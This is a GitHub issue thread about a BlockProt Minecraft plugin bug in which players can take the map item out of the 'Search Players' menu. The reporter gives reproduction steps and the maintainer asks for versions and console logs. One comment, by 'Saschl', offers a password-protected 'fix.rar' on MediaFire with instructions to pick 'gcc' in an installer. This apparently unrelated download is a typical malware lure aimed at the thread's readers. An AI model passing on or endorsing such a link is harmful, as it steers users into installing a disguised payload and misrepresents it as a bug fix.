### ISSUE TITLE
[Bug]: Taking map from Search Players slot

### ISSUE THREAD

**Issue by callmehtheguy** [spnda/BlockProt#305]
### Version of BlockProt

​

### Description of the bug

You can take the map from the UI and put it in your inventory

### Steps to reproduce

1. Go to any locked block
2. Select add players
3. Take the map and put it in your inventory

**Comment by Saschl** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by callmehtheguy** [comment]
I found it in a multiplayer Aternos server not owned by me, so I don't know the version.

**Comment by spnda** [comment]
I need the console log to see what happens.
This happens when an exception is thrown, which should be caught nowadays but used to be
indicative of an outdated plugin.

- Update BlockProt
- Tell me plugin version and Minecraft version
- Send me the console log

I have no other way of helping you without this information.
